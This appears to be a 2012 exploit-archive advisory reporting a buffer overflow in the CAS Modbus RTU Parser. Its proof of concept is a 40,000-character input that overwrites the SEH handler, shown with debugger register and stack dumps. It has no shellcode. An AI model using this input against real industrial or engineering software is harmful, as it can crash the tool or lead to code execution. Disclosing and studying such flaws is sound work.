CAS Modbus RTU Parser Buffer Overflow SEH



EKU-ID: 2624 CVE: OSVDB-ID:
Author: Senator of Pirates Published: 2012-09-07 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


Title : CAS Modbus RTU Parser Buffer Overflow SEH
Author : Senator of Pirates
Founder : Marshall Webb
Link Software :
http://www.chipkin.com/technical-resources/cas-modbus-rtu-parser/
FaceBook : /SenatorofPiratesInfo
Marshall's FaceBook : /lulznet
Date : 2012-09-07
Greets : USA & Morocco

PoC :
----

you should input a long string of A*40000 into poll message and
presson Analyze then SEH pointer is overwritten with 0x61616161 as you
can see below.

eax=00007531 ebx=00000000 ecx=0000099a edx=0012b138 esi=00f94f1c edi=00130000
eip=00408f79 esp=0012b118 ebp=0012f840 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
image00400000+0x8f79:
00408f79 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
0:000> dd esp
0012b118  0012fed4 0012fe08 0012f840 00000004
0012b128  5d5b0a0d 3a2c0920 7b29282e 003e3c7d
0012b138  61616161 61616161 61616161 61616161
0012b148  61616161 61616161 61616161 61616161
0012b158  61616161 61616161 61616161 61616161
0012b168  61616161 61616161 61616161 61616161
0012b178  61616161 61616161 61616161 61616161
0012b188  61616161 61616161 61616161 61616161